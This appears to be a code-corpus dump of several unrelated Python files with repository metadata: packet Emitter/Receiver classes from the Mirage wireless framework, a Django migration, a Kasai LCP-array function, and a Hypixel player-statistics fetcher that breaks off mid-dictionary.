self.transmitting = False
super().__init__(waitEmpty=False)
def isTransmitting(self):
'''
This method indicates if the Emitter is actually transmitting.
:return: boolean indicating if the Emitter is actually transmitting
:rtype: bool
:Example:
>>> emitter.isTransmitting()
True
'''
return self.transmitting
def _send(self,data):
if isinstance(data,bytes) and data[:5] == b"WAIT:":
time.sleep(float(data[5:]))
else:
self.device.send(data)
def convert(self,packet):
'''
This method converts a Mirage Packet into a raw Packet (e.g. bytes array or scapy frame). It must be overloaded by child classes.
:param packet: Mirage Packet to convert
:type packet: mirage.libs.wireless_utils.packets.Packet
:return: raw representation of a packet
'''
if isinstance(packet,Packet):
return packet.packet
else:
io.fail("Malformed packet")
return None
def convertMiragePacketToRaw(self,data):
'''
This method is an alias for the convert method of an emitter.
:param data: raw representation of a packet
:return: Mirage packet
:rtype: mirage.libs.wireless_utils.packets.Packet
'''
return self.convert(data)
def _task(self):
if not self.isEmpty():
self.transmitting = True
packet = self.queue.get()
if isinstance(packet,WaitPacket):
data = bytes("WAIT:"+str(packet.time),"ascii")
else:
data = self.convert(packet)
if data is not None:
self._send(data)
self.transmitting = not self.isEmpty()
else:
time.sleep(0.005)
def send(self,*packets):
'''
This method allows to send a Mirage Packet.
:param `*packets`: packets to send
:type `*packets`: mirage.libs.wireless_utils.packets.Packet (multiple)
:Example:
>>> emitter.send(packet1, packet2, packet3)
>>> emitter.send(packet1)
'''
for packet in packets:
self.queue.put(packet)
def sendp(self,*packets):
'''
This method is an alias for `send`.
:param `*packets`: packets to send
:type `*packets`: mirage.libs.wireless_utils.packets.Packet (multiple)
:Example:
>>> emitter.sendp(packet1, packet2, packet3)
>>> emitter.sendp(packet1)
'''
self.send(*packets)
def stop(self):
'''
Stops the Emitter and the associated device
'''
super().stop()
if self.isDeviceUp():
self.device.close()
class Receiver(PacketQueue):
'''
This class allows an user to communicate with a device in order to receive data. Indeed, Mirage provides no direct access to the device component from the modules : the hardware components are manipulated thanks to the Emitter class and the Receiver class. Receivers' classes for a given technology inherits from this class.
The packet are manipulated as an abstract representation in Emitters and Receivers (``mirage.libs.wireless_utils.packets.Packet``) and as a raw representation in Device (e.g. bytes array or scapy frame). That's why a Receiver must implement the following method :
* convert(self,packet) : this method converts a raw representation of a packet into a Mirage Packet
The constructor of a Receiver needs three parameters :
* `interface` : indicating the interface to use to instantiate the device, generally it will be provided by the user
* `packetType` : indicating the child class of Packet for the technology implemented by the Emitter
* `deviceType` : indicating the child class of Device to instanciate
A `_task` method is implemented by default. It calls the recv method of a Device, converts the result (if it is not None) to a Mirage Packet and adds it to the queue. If you want to customize this behaviour, you can overload this method.
'''
def __init__(self,interface,packetType=Packet, deviceType=Device):
self.interface = interface
self.packetType = packetType
self.deviceType = deviceType
self.device = self.deviceType.get(self.interface)
self.callbacks = []
self.receiving = False
self.callbacksQueue = Queue()
self.callbacksActiveListening = False
super().__init__(waitEmpty=False, autoStart=True)
def convert(self,data):
'''
This method converts a raw Packet (e.g. bytes array or scapy frame) into a Mirage Packet. It must be overloaded by child classes.
:param data: raw representation of a packet
:return: Mirage packet
:rtype: mirage.libs.wireless_utils.packets.Packet
'''
return Packet(packet=data)
def convertRawToMiragePacket(self,data):
'''
This method is an alias for the convert method of a receiver.
:param data: raw representation of a packet
:return: Mirage packet
:rtype: mirage.libs.wireless_utils.packets.Packet
'''
return self.convert(data)
def _add(self,data):
if data is not None:
packet = self.convert(data)
self._executeCallbacks(packet)
if packet is not None:
self.queue.put(packet)
def isReceiving(self):
'''
This method indicates if the Receiver is actually receiving.
:return: boolean indicating if the Receiver is actually receiving
:rtype: bool
:Example:
>>> receiver.isReceiving()
True
'''
return self.receiving
def _task(self):
self.receiving = True
pkt = self.device.recv()
self._add(pkt)
self.receiving = False
def clean(self):
'''
This method removes every Mirage Packets stored in the queue.
:Example:
>>> receiver.clean()
'''
while not self.isEmpty():
self.skip()
def skip(self,timeout=None):
'''
This method skips the next Mirage Packet stored in the queue.
:param timeout: time (in seconds) before the method fails
:type timeout: float
:Example:
>>> receiver.skip(timeout=1.0)
'''
next(self.receive(timeout=timeout))
def next(self,timeout=None):
'''
This method returns the next Mirage Packet stored in the queue.
:param timeout: time (in seconds) before the method fails
:type timeout: float
:Example:
>>> packet = receiver.next(timeout=1.0)
'''
return next(self.receive(timeout=timeout))
def receive(self,nb=1,loop=False,timeout=None):
'''
This method provide a generator allowing to iterate on the incoming Mirage Packets.
:param nb: number of packets to receive in the iterator
:type nb: int
:param loop: boolean indicating if the packets must be continuously received
:type loop: bool
:param timeout: time (in seconds) before a reception fails
:type timeout: float
:return: generator of Mirage Packets (``mirage.libs.wireless_utils.packets.Packet``)
:Example:
>>> for packet in receiver.receive(nb=5):
... packet.show()
<< Packet >>
<< Packet >>
<< Packet >>
<< Packet >>
<< Packet >>
>>> for packet in receiver.receive(loop=True, timeout=1.0):
... if packet is not None:
... packet.show()
... else:
... io.info("Timeout !")
[INFO] Timeout !
<< Packet >>
[INFO] Timeout !
[INFO] Timeout !
<< Packet >>
[...]
'''
def get():
try:
return self.queue.get(timeout=timeout)
except Empty:
return None
if loop:
while True:
yield get()
else:
for _ in range(nb):
yield get()
def onEvent(self,event="*", callback=None, args=[], kwargs={}, background=True):
'''
This function allows to attach a callback, triggered when some specific Mirage Packets are received.
It is linked to an *event*, which is a string indicating when should the callback be called.
Three formats exists describing an event :
* *\** : indicating "the callback is called every times a packet is received"
* *n* : indicating "the callback is called every times n packets have been received"
* *packetType* : indicating "the callback is called every times a packet of type 'packetType' is received"
Some examples are represented in the following table:
+----------------------+-------------------------------+
| Event | Description |
+======================+===============================+
| \* | every packet |
+----------------------+-------------------------------+
| 3 | every 3 packets |
+----------------------+-------------------------------+
| BLEReadRequest | every BLE Read Request |
+----------------------+-------------------------------+
The function *callback* is called with the following format : callback(packet,*args,**kwargs)
A callback can be run in the associated background thread (by default) or in foreground by using the methods ``listenCallbacks`` and ``stopListeningCallbacks``.
:param event: string describing the associated event
:type event: str
:param callback: function to call when the associated event is triggered
:type callback: function
:param args: unnamed arguments to provide to the function
:type args: list
:param kwargs: named arguments to provide to the function
:type kwargs: dict
:param background: boolean indicating if the callback is run in background or in foreground
:type background: bool
:Example:
>>> def show(packet):
... packet.show()
>>> receiver.onEvent("*", callback=show)
>>> def onReadRequest(packet,username):
... io.info("Hello "+username+", I have an incoming Read Request for you : "+str(packet))
>>> receiver.onEvent("BLEReadRequest",callback=onReadRequest, args=["Romain"])
'''
self.callbacks.append(Callback(event=event, function=callback, args=args, kwargs=kwargs, background=background))
def _executeCallbacks(self,packet):
for callback in self.callbacks:
callback.update(packet)
if callback.runnable:
if callback.background:
callback.run(packet)
else:
self.callbacksQueue.put((self.callbacks.index(callback),packet))
def stopListeningCallbacks(self):
'''
Stops the foreground callbacks execution loop.
:Example:
>>> receiver.stopListeningCallbacks()
'''
self.callbacksActiveListening = False
def listenCallbacks(self):
'''
Starts the foreground callbacks execution loop.
:Example:
>>> receiver.listenCallbacks()
'''
self.callbacksActiveListening = True
while self.callbacksActiveListening:
if not self.callbacksQueue.empty():
index,packet = self.callbacksQueue.get()
self.callbacks[index].run(packet)
def removeCallbacks(self):
'''
Remove the callbacks attached to the Receiver.
'''
self.callbacks = []
def stop(self):
'''
Stops the Receiver and the associated device
'''
super().stop()
if self.isDeviceUp():
self.device.close()
| 31.136709
| 325
| 0.694121
|
5ab302b636983e731ff53435c5bc2eb8e0e8f5fc
| 348
|
py
|
Python
|
CourseMatter/content/migrations/0004_alter_course_options.py
|
ss4328/CourseMatter
|
6eb7d13c178644bb300c3d7a7366e7aa290cce47
|
[
"MIT"
] | null | null | null |
CourseMatter/content/migrations/0004_alter_course_options.py
|
ss4328/CourseMatter
|
6eb7d13c178644bb300c3d7a7366e7aa290cce47
|
[
"MIT"
] | null | null | null |
CourseMatter/content/migrations/0004_alter_course_options.py
|
ss4328/CourseMatter
|
6eb7d13c178644bb300c3d7a7366e7aa290cce47
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.3 on 2021-05-20 22:12
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('content', '0003_content_course'),
]
operations = [
migrations.AlterModelOptions(
name='course',
options={'ordering': ['-created_on']},
),
]
| 19.333333
| 50
| 0.58908
|
68f66638b5cae9c1a1ca0bce4752cf7ae5d676f2
| 510
|
py
|
Python
|
src/kgmk/dsa/string/lcp_array/kasai/__init__.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
src/kgmk/dsa/string/lcp_array/kasai/__init__.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
src/kgmk/dsa/string/lcp_array/kasai/__init__.py
|
kagemeka/python
|
486ce39d97360b61029527bacf00a87fdbcf552c
|
[
"MIT"
] | null | null | null |
import typing
class LCPKasai():
def __call__(
self,
a: typing.List[int],
sa: typing.List[int],
) -> typing.List[int]:
n = len(a)
assert n > 0 and len(sa) == n
rank = [-1] * n
for i, x in enumerate(sa): rank[x] = i
h, l = [0] * (n - 1), 0
for i in range(n):
if l > 0: l -= 1
r = rank[i]
if r == n - 1: continue
j = sa[r + 1]
while i + l < n and j + l < n:
if a[i + l] != a[j + l]: break
l += 1
h[r] = l
return h
| 20.4
| 42
| 0.433333
|
13642a4f2c28f57af31267886833f1693ef73940
| 83,968
|
py
|
Python
|
core/minecraft/hypixel/player.py
|
vcokltfre/Myaer
|
8e2a57f26635781e19716b47028f465617defa75
|
[
"MIT"
] | null | null | null |
core/minecraft/hypixel/player.py
|
vcokltfre/Myaer
|
8e2a57f26635781e19716b47028f465617defa75
|
[
"MIT"
] | null | null | null |
core/minecraft/hypixel/player.py
|
vcokltfre/Myaer
|
8e2a57f26635781e19716b47028f465617defa75
|
[
"MIT"
] | null | null | null |
"""
MIT License
Copyright (c) 2020 MyerFire
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import time
import ratelimit
import core.caches.players
import core.minecraft.hypixel.friends
import core.minecraft.hypixel.guild
import core.minecraft.hypixel.request
import core.minecraft.hypixel.static.static
import core.minecraft.hypixel.status
async def get_player_data(uuid, *, use_cache: bool = True, get_guild: bool = False, get_friends: bool = False,
get_status: bool = False):
if not use_cache:
valid = False
else:
player_cache = await core.caches.players.find_player_data(uuid)
if player_cache: # returns cached data only if it contains all the requested information
valid = True if ((not get_guild) and (not get_friends) or (
get_friends and player_cache["data"]["friends"]) or (
get_guild and player_cache["data"]["guild_data"])) and (time.time()) - \
player_cache["time"] < 14400 else False # cached for 5 minutes
else:
valid = False
if valid:
return player_cache["data"]
else:
try:
player_json = await core.minecraft.hypixel.request.get_player_uuid(uuid)
except NameError:
raise NameError("No Hypixel stats")
except ratelimit.RateLimitException:
raise OverflowError # idk how to make custom exceptions so this is close enough
if get_guild: # only get guild if necessary, because it's another request
try:
player_guild_json = await core.minecraft.hypixel.guild.get_guild_data(uuid)
except NameError:
player_guild_json = None
except ratelimit.RateLimitException:
raise ratelimit.RateLimitException
else:
player_guild_json = None
if get_friends: # only get friends if necessary, because it's another request
try:
player_friends_json = await core.minecraft.hypixel.friends.get_friends(uuid)
except NameError:
player_friends_json = None
except ratelimit.RateLimitException:
raise ratelimit.RateLimitException
else:
player_friends_json = None
if get_status: # only get status if necessary, because it's another request
try:
player_status_json = await core.minecraft.hypixel.status.get_status(uuid)
except NameError:
player_status_json = None
except ratelimit.RateLimitException:
raise ratelimit.RateLimitException
else:
player_status_json = None
player = { # This thing is pretty torture
"name": player_json.get("player", {}).get("displayname", ""),
"level_data": (await core.minecraft.hypixel.static.static.get_network_level_data(
player_json.get("player", {}).get("networkExp", 0))),
"karma": player_json.get("player", {}).get("karma", 0),
"achievement_points": player_json.get("player", {}).get("achievementPoints", 0),
"rank_data": (
await core.minecraft.hypixel.static.static.get_rank_data((player_json.get("player", {}).get("rank", None)),
(player_json.get("player", {}).get("prefix",
None)), (
player_json.get("player", {}).get(
"monthlyPackageRank", None)), (
player_json.get("player", {}).get(
"newPackageRank", None)),
(player_json.get("packageRank", None)))),
"guild_data": player_guild_json,
"friends": player_friends_json,
"status": player_status_json,
"login_times": {
"first": player_json.get("player", {}).get("firstLogin", 0),
"last": player_json.get("player", {}).get("lastLogin", 0)
},
"social_media": {
"twitter": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("TWITTER", None),
"youtube": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("YOUTUBE", None),
"instagram": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("INSTAGRAM", None),
"twitch": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("TWITCH", None),
"discord": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("DISCORD", None),
"hypixel_forums": player_json.get("player", {}).get("socialMedia", {}).get("links", {}).get("HYPIXEL",
None),
},
"bedwars": {
"star": player_json.get("player", {}).get("achievements", {}).get("bedwars_level", 0),
"coins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("coins_bedwars", 0),
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("beds_broken_bedwars",
0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("final_kills_bedwars",
0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("winstreak", 0),
"solo": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("eight_one_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_one_winstreak", 0),
},
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("eight_two_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_winstreak", 0),
},
"threes": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("four_three_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_three_winstreak", 0),
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("four_four_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_winstreak", 0),
},
"four_v_four": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("two_four_kills_bedwars",
0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_deaths_bedwars", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("two_four_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"two_four_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("two_four_winstreak",
0),
},
"dreams": {
"armed": {
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_armed_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_armed_diamond_resources_collected_bedwars", 0),
}
}
},
"castle": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get("castle_wins_bedwars",
0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"castle_diamond_resources_collected_bedwars", 0),
}
},
"lucky_blocks": {
"doubles": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_beds_broken_bedwars", 0),
"beds_lost": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_beds_lost_bedwars", 0),
"kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_kills_bedwars", 0),
"void_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_void_kills_bedwars", 0),
"deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_deaths_bedwars", 0),
"void_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_void_deaths", 0),
"final_kills": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_final_kills_bedwars", 0),
"final_deaths": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_final_deaths_bedwars", 0),
"wins": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_wins_bedwars", 0),
"losses": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_losses_bedwars", 0),
"winstreak": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_winstreak", 0),
"items_purchased": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky__items_purchased_bedwars", 0),
"resources_collected": {
"all": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_resources_collected_bedwars", 0),
"iron": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_iron_resources_collected_bedwars", 0),
"gold": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_gold_resources_collected_bedwars", 0),
"emeralds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_emerald_resources_collected_bedwars", 0),
"diamonds": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"eight_two_lucky_diamond_resources_collected_bedwars", 0),
}
},
"fours": {
"games_played": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
"four_four_lucky_games_played_bedwars", 0),
"beds_broken": player_json.get("player", {}).get("stats", {}).get("Bedwars", {}).get(
